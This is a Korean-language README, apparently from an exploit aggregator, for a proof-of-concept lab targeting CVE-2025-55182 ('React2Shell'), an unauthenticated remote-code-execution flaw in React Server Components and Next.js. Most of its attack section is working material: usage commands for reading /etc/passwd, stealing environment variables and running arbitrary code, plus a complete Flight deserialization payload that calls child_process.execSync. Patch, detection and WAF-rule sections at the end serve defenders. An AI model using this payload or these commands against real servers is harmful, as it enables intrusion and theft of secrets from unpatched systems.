Share
## https://sploitus.com/exploit?id=C3DAD439-6874-59C4-91BE-2FBF9334A154
# CVE-2025-55182 (React2Shell) PoC ν™˜κ²½

> **κ²½κ³ **: 이 ν”„λ‘œμ νŠΈλŠ” **λ³΄μ•ˆ 연ꡬ 및 ꡐ윑 λͺ©μ **으둜만 μ‚¬μš©ν•΄μ•Ό ν•©λ‹ˆλ‹€.
> ν—ˆκ°€ 없이 νƒ€μΈμ˜ μ‹œμŠ€ν…œμ— μ‚¬μš©ν•˜λŠ” 것은 λΆˆλ²•μž…λ‹ˆλ‹€.

## 취약점 κ°œμš”

| ν•­λͺ© | λ‚΄μš© |
|------|------|
| **CVE ID** | CVE-2025-55182 |
| **별칭** | React2Shell |
| **CVSS 점수** | 10.0 (Critical - μ΅œλŒ€ 심각도) |
| **취약점 μœ ν˜•** | Unauthenticated Remote Code Execution (RCE) |
| **발견자** | Lachlan Davidson |
| **곡개일** | 2025λ…„ 12μ›” 3일 |

## 영ν–₯λ°›λŠ” 버전

### React νŒ¨ν‚€μ§€
- `react-server-dom-webpack`: 19.0, 19.1.0, 19.1.1, 19.2.0
- `react-server-dom-parcel`: 19.0, 19.1.0, 19.1.1, 19.2.0
- `react-server-dom-turbopack`: 19.0, 19.1.0, 19.1.1, 19.2.0

### Next.js
- 15.0.4, 15.1.8, 15.2.5, 15.3.5, 15.4.7, 15.5.6, 16.0.6

## ν”„λ‘œμ νŠΈ ꡬ쑰

```
CVE-2025-55182/
β”œβ”€β”€ README.md                    # 이 파일
β”œβ”€β”€ vulnerable-server/           # μ·¨μ•½ν•œ Next.js μ„œλ²„
β”‚   β”œβ”€β”€ package.json
β”‚   β”œβ”€β”€ next.config.js
β”‚   β”œβ”€β”€ tsconfig.json
β”‚   └── app/
β”‚       β”œβ”€β”€ layout.tsx
β”‚       β”œβ”€β”€ page.tsx
β”‚       └── actions.ts           # Server Action
β”œβ”€β”€ exploit/                     # 곡격 PoC
β”‚   β”œβ”€β”€ package.json
β”‚   β”œβ”€β”€ poc.js                   # RCE 곡격 슀크립트
β”‚   └── check-vulnerability.js   # 취약점 체크 슀크립트
└── React2Shell-CVE-2025-55182-original-poc/  # 원본 PoC μ°Έμ‘°
```

## λΉ λ₯Έ μ‹œμž‘

### 1. μ·¨μ•½ν•œ μ„œλ²„ μ„€μ • 및 μ‹€ν–‰

```bash
# μ˜μ‘΄μ„± μ„€μΉ˜
cd vulnerable-server
npm install

# 개발 λͺ¨λ“œλ‘œ μ„œλ²„ μ‹€ν–‰ (포트 3000)
npm run dev
```

μ„œλ²„κ°€ http://localhost:3000 μ—μ„œ μ‹€ν–‰λ©λ‹ˆλ‹€.

### 2. 곡격 PoC μ‹€ν–‰

μƒˆ ν„°λ―Έλ„μ—μ„œ:

```bash
# μ˜μ‘΄μ„± μ„€μΉ˜
cd exploit
npm install

# 취약점 체크
npm run check

# PoC μ‹€ν–‰ (ν…ŒμŠ€νŠΈ λͺ¨λ“œ)
npm run exploit
```

## 곡격 PoC μ‚¬μš©λ²•

### κΈ°λ³Έ ν…ŒμŠ€νŠΈ (console.log)

```bash
node poc.js -m test
```

### 계산기 μ‹€ν–‰ (RCE 증λͺ… κ΅­λ£°)

```bash
# macOS
node poc.js -m calc

# Linux
node poc.js -m calc -c linux

# Windows
node poc.js -m calc -c windows
```

### μ‹œμŠ€ν…œ λͺ…λ Ή μ‹€ν–‰ (RCE)

```bash
# id λͺ…λ Ή μ‹€ν–‰
node poc.js -t http://localhost:3000 -m rce -c "id"

# 파일 읽기
node poc.js -t http://localhost:3000 -m rce -c "cat /etc/passwd"

# μ‹œμŠ€ν…œ 정보
node poc.js -t http://localhost:3000 -m rce -c "uname -a"
```

### ν™˜κ²½ λ³€μˆ˜ νƒˆμ·¨

```bash
node poc.js -t http://localhost:3000 -m env
```

### μ‚¬μš©μž μ •μ˜ μ½”λ“œ μ‹€ν–‰

```bash
node poc.js -m custom -c "require('fs').readFileSync('/etc/passwd').toString()"
```

## 기술적 뢄석

### 취약점 κ·Όλ³Έ 원인

React Server Components의 Flight ν”„λ‘œν† μ½œμ—μ„œ ν΄λΌμ΄μ–ΈνŠΈκ°€ μ „μ†‘ν•œ 데이터λ₯Ό 역직렬화할 λ•Œ λ°œμƒν•©λ‹ˆλ‹€.

```
requireModule ν•¨μˆ˜κ°€ ν΄λΌμ΄μ–ΈνŠΈκ°€ μ „μ†‘ν•œ 속성λͺ…을 검증 없이 μ‹ λ’°
β†’ moduleExports[metadata[NAME]] μ‹€ν–‰ μ‹œ hasOwnProperty 검사 μ—†μŒ
β†’ ν”„λ‘œν† νƒ€μž… 체인 μ‘°μž‘ κ°€λŠ₯ (Server-Side Prototype Pollution)
β†’ Function μƒμ„±μž νšλ“ β†’ RCE
```

### 곡격 체인

1. **`$@x` 역직렬화 트리거** - Chunk 객체 μ°Έμ‘° νšλ“
2. **Promise 체이닝 μ•…μš©** - `.then` λ©”μ„œλ“œλ₯Ό κ°€μ§„ thenable 객체 μ£Όμž…
3. **κ°€μ§œ Chunk 객체둜 νŒŒμ„œ μž¬μ§„μž…** - `status: resolved_model` μ„€μ •
4. **κ°€μ ― 체인 ꡬ성** - `_response`, `_formData` λ“± ν™œμš©
5. **Function μƒμ„±μž νšλ“** - `$1:constructor:constructor`
6. **μž„μ˜ μ½”λ“œ μ‹€ν–‰** - `new Function(μ•…μ„±μ½”λ“œ)` μ‹€ν–‰

### νŽ˜μ΄λ‘œλ“œ ꡬ쑰

```javascript
{
    '0': '$1',
    '1': {
        'status': 'resolved_model',
        'reason': 0,
        '_response': '$4',
        'value': '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
        'then': '$2:then'
    },
    '2': '$@3',
    '3': [],
    '4': {
        '_prefix': 'process.mainModule.require("child_process").execSync("id")//',
        '_formData': {
            'get': '$3:constructor:constructor'
        },
        '_chunks': '$2:_response:_chunks'
    }
}
```

## 패치 방법

### Next.js μ—…κ·Έλ ˆμ΄λ“œ

```bash
# 15.0.x μ‚¬μš©μž
npm install next@15.0.5

# 15.1.x μ‚¬μš©μž
npm install next@15.1.9

# 15.2.x μ‚¬μš©μž
npm install next@15.2.6
```

### React νŒ¨ν‚€μ§€ μ—…κ·Έλ ˆμ΄λ“œ

```bash
npm install react-server-dom-webpack@19.0.1
npm install react-server-dom-parcel@19.0.1
npm install react-server-dom-turbopack@19.0.1
```

## 탐지 방법

### HTTP μš”μ²­ νŠΉμ§•

- `POST` μš”μ²­
- `Next-Action` 헀더 쑴재
- `multipart/form-data` ν˜•μ‹
- 본문에 `$@`, `resolved_model`, `constructor` λ“±μ˜ νŒ¨ν„΄

### WAF κ·œμΉ™ μ˜ˆμ‹œ

```
# μ˜μ‹¬μŠ€λŸ¬μš΄ Flight νŽ˜μ΄λ‘œλ“œ 탐지
SecRule REQUEST_HEADERS:Next-Action "@rx ." \
    "id:1001,phase:2,deny,status:403,\
    chain"
SecRule REQUEST_BODY "@rx constructor.*constructor" \
    "t:lowercase"
```

## 참고 자료

- [React 곡식 λΈ”λ‘œκ·Έ](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
- [원본 PoC (Lachlan Davidson)](https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc)
- [Datadog Security Labs 뢄석](https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/)
- [Wiz 뢄석](https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182)

## λΌμ΄μ„ μŠ€

이 ν”„λ‘œμ νŠΈλŠ” **ꡐ윑 및 연ꡬ λͺ©μ **으둜만 μ œκ³΅λ©λ‹ˆλ‹€.
μ•…μ˜μ μΈ λͺ©μ μœΌλ‘œμ˜ μ‚¬μš©μ„ κΈˆμ§€ν•©λ‹ˆλ‹€.

---

**주의**: μ‹€μ œ ν™˜κ²½μ—μ„œ 이 취약점을 λ°œκ²¬ν–ˆλ‹€λ©΄ μ¦‰μ‹œ νŒ¨μΉ˜ν•˜μ„Έμš”.
곡격이 ν™•μΈλœ 경우 λ³΄μ•ˆ νŒ€μ— λ³΄κ³ ν•˜κ³  μΉ¨ν•΄ 쑰사λ₯Ό μˆ˜ν–‰ν•˜μ„Έμš”.